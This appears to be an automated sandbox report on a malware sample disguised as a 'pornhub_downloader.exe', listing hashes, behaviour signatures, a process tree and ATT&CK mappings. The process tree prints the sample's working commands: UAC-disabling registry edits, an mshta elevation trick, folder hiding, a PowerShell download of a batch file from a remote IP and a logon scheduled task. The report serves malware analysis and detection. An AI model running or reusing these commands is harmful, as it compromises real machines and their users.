Analysis
  max time kernel: 149s
  max time network: 151s
  platform: windows10-2004_x64
  resource: win10v2004-20240802-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 28/09/2024, 11:49
Static task: static1
Behavioral task: behavioral1
  Sample: pornhub_downloader.exe
  Resource: win7-20240729-en
Behavioral task: behavioral2
  Sample: pornhub_downloader.exe
  Resource: win10v2004-20240802-en
General
  Target: pornhub_downloader.exe
  Size: 88KB
  MD5: 759f5a6e3daa4972d43bd4a5edbdeb11
  SHA1: 36f2ac66b894e4a695f983f3214aace56ffbe2ba
  SHA256: 2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
  SHA512: f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
  SSDEEP: 1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV
Malware Config
Signatures

UAC bypass
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"  (reg.exe)
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  (reg.exe)
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"  (reg.exe)

Blocklisted process makes network request (1 IoC)
  flow 21, pid 2688, powershell.exe

Command and Scripting Interpreter: PowerShell
  pid 2688, powershell.exe

Sets file to hidden (1 TTP, 1 IoC)
  Modifies file attributes to stop it showing in Explorer etc.
  pid 3568, attrib.exe

Checks computer location settings (2 TTPs, 3 IoCs)
  Looks up the country code configured in the registry, likely a geofence.
  Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation  (pornhub_downloader.exe)
  Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation  (mshta.exe)
  Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation  (PORNHU~1.EXE)

Access Token Manipulation: Create Process with Token (1 TTP, 1 IoC)
  pid 4000, mshta.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 2 IoCs)
  Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  (pornhub_downloader.exe)
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  (PORNHU~1.EXE)

Enumerates system info in registry (2 TTPs, 3 IoCs)
  Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  (msedge.exe)
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  (msedge.exe)
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  (msedge.exe)

Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid 4352, schtasks.exe

Suspicious behavior: EnumeratesProcesses (12 IoCs)
  pid 2688 powershell.exe (x2), pid 2408 msedge.exe (x2), pid 3908 msedge.exe (x2), pid 1808 identity_helper.exe (x2), pid 2156 msedge.exe (x4)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (7 IoCs)
  pid 3908 msedge.exe (x7)

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, pid 2688, powershell.exe

Suspicious use of FindShellTrayWindow (25 IoCs)
  pid 3908 msedge.exe (x25)

Suspicious use of SendNotifyMessage (24 IoCs)
  pid 3908 msedge.exe (x24)

Suspicious use of WriteProcessMemory (64 IoCs)
  description                         pid   Process                 procid_target  count
  PID 3096 wrote to memory of 4032    3096  pornhub_downloader.exe  84             x2
  PID 4032 wrote to memory of 4000    4032  cmd.exe                 87             x2
  PID 4000 wrote to memory of 3388    4000  mshta.exe               88             x3
  PID 3388 wrote to memory of 684     3388  PORNHU~1.EXE            89             x2
  PID 684 wrote to memory of 2848     684   cmd.exe                 91             x2
  PID 684 wrote to memory of 2440     684   cmd.exe                 92             x2
  PID 684 wrote to memory of 3360     684   cmd.exe                 93             x2
  PID 684 wrote to memory of 5060     684   cmd.exe                 94             x2
  PID 5060 wrote to memory of 3532    5060  cmd.exe                 95             x2
  PID 684 wrote to memory of 3908     684   cmd.exe                 96             x2
  PID 684 wrote to memory of 3568     684   cmd.exe                 97             x2
  PID 3908 wrote to memory of 2760    3908  msedge.exe              98             x2
  PID 684 wrote to memory of 2688     684   cmd.exe                 99             x2
  PID 3908 wrote to memory of 2724    3908  msedge.exe              100            x37

Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Views/modifies file attributes (1 TTP, 1 IoC)
  pid 3568, attrib.exe
Processes

1. C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"
   PID: 3096
   - Checks computer location settings
   - System Location Discovery: System Language Discovery
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5E0E.tmp\5E0F.tmp\5E10.bat C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"
      PID: 4032
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\system32\mshta.exe
         Command line: mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
         PID: 4000
         - Checks computer location settings
         - Access Token Manipulation: Create Process with Token
         - Suspicious use of WriteProcessMemory

         4. C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE
            Command line: "C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE" goto :target
            PID: 3388
            - Checks computer location settings
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory

            5. C:\Windows\system32\cmd.exe
               Command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\61F6.tmp\61F7.tmp\61F8.bat C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE goto :target"
               PID: 684
               - Suspicious use of WriteProcessMemory

               6. C:\Windows\system32\reg.exe
                  Command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
                  PID: 2848
                  - UAC bypass

               6. C:\Windows\system32\reg.exe
                  Command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
                  PID: 2440
                  - UAC bypass

               6. C:\Windows\system32\reg.exe
                  Command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
                  PID: 3360
                  - UAC bypass

               6. C:\Windows\system32\cmd.exe
                  Command line: C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
                  PID: 5060
                  - Suspicious use of WriteProcessMemory

                  7. C:\Windows\system32\reg.exe
                     Command line: reg query HKEY_CLASSES_ROOT\http\shell\open\command
                     PID: 3532

               6. C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
                  PID: 3908
                  - Enumerates system info in registry
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  - Suspicious use of FindShellTrayWindow
                  - Suspicious use of SendNotifyMessage
                  - Suspicious use of WriteProcessMemory

                  7. C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                     Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd0fd646f8,0x7ffd0fd64708,0x7ffd0fd64718
                     PID: 2760

                  7. C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                     Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1956 /prefetch:2
                     PID: 2724

                  7. C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                     Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
                     PID: 2408
                     - Suspicious behavior: EnumeratesProcesses

                  7. C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                     Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:8
                     PID: 1440

                  7. C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                     Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                     PID: 2348

                  7. C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                     Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
                     PID: 2592

                  7. C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                     Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
                     PID: 3976

                  7. C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                     Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5568 /prefetch:8
                     PID: 1104

                  7. C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                     Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5568 /prefetch:8
                     PID: 1808
                     - Suspicious behavior: EnumeratesProcesses

                  7. C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                     Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
                     PID: 1456

                  7. C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                     Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
                     PID: 3924

                  7. C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                     Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1
                     PID: 1776

                  7. C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                     Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
                     PID: 4488

                  7. C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                     Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1856 /prefetch:2
                     PID: 2156
                     - Suspicious behavior: EnumeratesProcesses

               6. C:\Windows\system32\attrib.exe
                  Command line: attrib +s +h d:\net
                  PID: 3568
                  - Sets file to hidden
                  - Views/modifies file attributes

               6. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
                  PID: 2688
                  - Blocklisted process makes network request
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken

               6. C:\Windows\system32\schtasks.exe
                  Command line: SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
                  PID: 4352
                  - Scheduled Task/Job: Scheduled Task

1. C:\Windows\System32\CompPkgSrv.exe
   Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
   PID: 4284

1. C:\Windows\System32\CompPkgSrv.exe
   Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
   PID: 1212
Network
MITRE ATT&CK Enterprise v15
  Execution
    Command and Scripting Interpreter (1)
      PowerShell (1)
    Scheduled Task/Job (1)
      Scheduled Task (1)
  Privilege Escalation
    Abuse Elevation Control Mechanism (1)
      Bypass User Account Control (1)
    Access Token Manipulation (1)
      Create Process with Token (1)
    Scheduled Task/Job (1)
      Scheduled Task (1)
  Defense Evasion
    Abuse Elevation Control Mechanism (1)
      Bypass User Account Control (1)
    Access Token Manipulation (1)
      Create Process with Token (1)
    Hide Artifacts (2)
      Hidden Files and Directories (2)
    Impair Defenses (1)
      Disable or Modify Tools (1)
    Modify Registry (1)
Downloads